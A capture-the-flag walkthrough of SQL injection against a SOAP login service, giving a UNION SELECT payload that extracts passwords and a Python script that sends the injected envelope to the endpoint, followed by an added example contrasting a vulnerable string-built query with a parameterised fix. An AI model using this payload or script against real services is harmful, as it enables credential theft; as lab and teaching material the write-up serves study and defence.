I am writing this walkthrough because, in my opinion, it is one of the worst modules ever made: it is very incomplete and full of missing information.
- Identification of the problem and context
The API in use is a SOAP web service. SOAP requests are sent as XML. The user's input, such as username and password, is passed on to a function that most likely performs an SQL query to authenticate the user.
The initial idea was to take advantage of an SQLi to manipulate the SQL query and obtain a password that starts with “flag”. This led us to study how to inject SQL into an input parameter so that the SQL query on the server would return the desired password.
- Analysis of the SOAP payload
The SOAP payload that interests us is the one that sends the username and password. In a vulnerable application, SQL can be injected directly into these parameters.
A basic payload (without SQL injection) has a format similar to this:
<soap:Body>
<LoginRequest xmlns="http://tempuri.org/">
<username>admin</username>
<password>password</password>
</LoginRequest>
</soap:Body>
- First attempt at SQL injection
Initially we tried to inject a simple SQLi using a UNION SELECT:
admin' UNION SELECT password, NULL FROM users WHERE password LIKE '(Enter the parameter)' --
The result of this injection was that the server returned the password (or passwords) starting with “flag”, just as required.
- Adaptation of the Python script
We built a Python script to send our SOAP request with the SQL injection automatically. The script:
Requests input from the user (in this case, the SQLi to be performed).
Builds the SOAP payload containing the SQL injection.
Sends the request to the server via requests.post().
Displays the response containing the password (or other requested information).
Here is the final Python script:
import requests
from xml.sax.saxutils import escape  # keeps <, > and & in the input from breaking the XML

while True:
    cmd = input("$ ")  # value placed in <username>, e.g. the UNION SELECT shown above
    payload = f'''<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:tns="http://tempuri.org/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/">
<soap:Body>
<LoginRequest xmlns="http://tempuri.org/">
<username>{escape(cmd)}</username>
<password>password</password>
</LoginRequest>
</soap:Body>
</soap:Envelope>'''
    response = requests.post(
        "http://ip:3002/wsdl",
        data=payload,
        # SOAP 1.1 endpoints expect text/xml; requests sends no Content-Type for a plain string body
        headers={"SOAPAction": '"Login"', "Content-Type": "text/xml; charset=utf-8"},
    )
    print(response.content)
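To show why the UNION SELECT above works and what closes the hole, here is an added example (not part of the walkthrough or the module): a constructed in-memory SQLite login backend that parses a LoginRequest like the one above, with the string-built query beside its parameterised replacement. The users table, the echoed-username behaviour and the 'flag%' pattern filled into the payload are assumptions.

```python
import sqlite3
from xml.etree import ElementTree as ET
from xml.sax.saxutils import escape

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
LOGIN_NS = "http://tempuri.org/"
# The walkthrough's injection with a concrete LIKE pattern filled in (assumed: 'flag%').
INJECTED = "admin' UNION SELECT password, NULL FROM users WHERE password LIKE 'flag%' -- "


def make_db():
    """Constructed in-memory users table standing in for the module's backend."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "flag{constructed_sample}"), ("guest", "guest")])
    return db


def envelope(username, password):
    """Build a LoginRequest envelope shaped like the one in the walkthrough."""
    return (f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body>'
            f'<LoginRequest xmlns="{LOGIN_NS}"><username>{escape(username)}</username>'
            f'<password>{escape(password)}</password></LoginRequest>'
            f'</soap:Body></soap:Envelope>')


def parse_login(xml_text):
    """Server side: pull username/password out of the LoginRequest body."""
    req = ET.fromstring(xml_text).find(f"{{{SOAP_NS}}}Body/{{{LOGIN_NS}}}LoginRequest")
    return req.findtext(f"{{{LOGIN_NS}}}username"), req.findtext(f"{{{LOGIN_NS}}}password")


def login_vulnerable(db, username, password):
    """String-built query: the UNION's first column (a password) lands in the echoed username slot."""
    sql = (f"SELECT username, password FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return [row[0] for row in db.execute(sql)]


def login_fixed(db, username, password):
    """Parameterised query: the same input is only ever compared as data, never parsed as SQL."""
    sql = "SELECT username, password FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in db.execute(sql, (username, password))]


def run(handler, username=INJECTED, password="password"):
    """Route a constructed request through a handler; returns the usernames it would echo."""
    user, pw = parse_login(envelope(username, password))
    return handler(make_db(), user, pw)
```

Running `run(login_vulnerable)` returns a list containing the flag password, while `run(login_fixed)` returns an empty list because no row has the injected string as its literal username.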